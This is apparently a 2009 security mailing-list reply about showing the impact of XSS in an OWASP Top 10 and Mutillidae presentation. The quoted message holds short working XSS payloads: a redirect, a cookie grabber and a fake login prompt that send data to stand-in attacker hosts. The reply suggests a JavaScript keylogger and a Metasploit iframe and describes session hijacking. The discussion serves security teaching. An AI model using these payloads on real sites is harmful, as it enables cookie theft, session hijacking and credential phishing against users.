You could inject a JavaScript keylogger that can be seen here in the middler http://code.google.com/p/middler/source/browse/trunk/middlerlib/plugins/plugin-keylogger-INGUARDIANS-ONLY.py
<http://code.google.com/p/middler/source/browse/trunk/middlerlib/plugins/plugin-keylogger-INGUARDIANS-ONLY.py>Also, a metasploit iframe, which can be seen in the next file in the plugins directory. Cookie grabbing can be very interesting. Take for example a full SSL site with proper SSL only cookies, but the site has a XSS vulnerability. Grab the cookie, put it in your browser, and you could potentially have a session hijack, even though the site has full proper implemented SSL, all from a little XSS hole. On Thu, May 28, 2009 at 11:50 AM, Adrian Crenshaw <[email protected]>wrote: > Ok, I've got yet another presentation coming up, this time on the OWASP Top > 10 and Mutillidae. One of the things I'm going to cover is XSS. The > canonical example of course is: > > <script>alert("XSS");</script> > > but that is boring, and gives folks the impression that XSS is not that > serious. Better short eample swoul be: > > *Redirect traffic to your site:* > <script>window.location = "http://www.irongeek.com/";</script> > > *A little cookie Grabbing:* > <script> > new Image().src="http://some-ip/mutillidae/catch.php?cookie= > "+encodeURI(document.cookie); > </script> > * > Or maybe a password form to make people think they have to login, but it > just grabs the credentials:* > <script> > username=prompt('Please enter your username',' '); > password=prompt('Please enter your password',' '); > document.write("<img src=\"http://attacker.hak/catch.php?username= > "+username+"&password="+password+"\">"); > </script> > > What are other cool thing to inject, besides maybe BeEF, that shows of how > XSS can be a big deal? > > Thanks, > Adrian > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
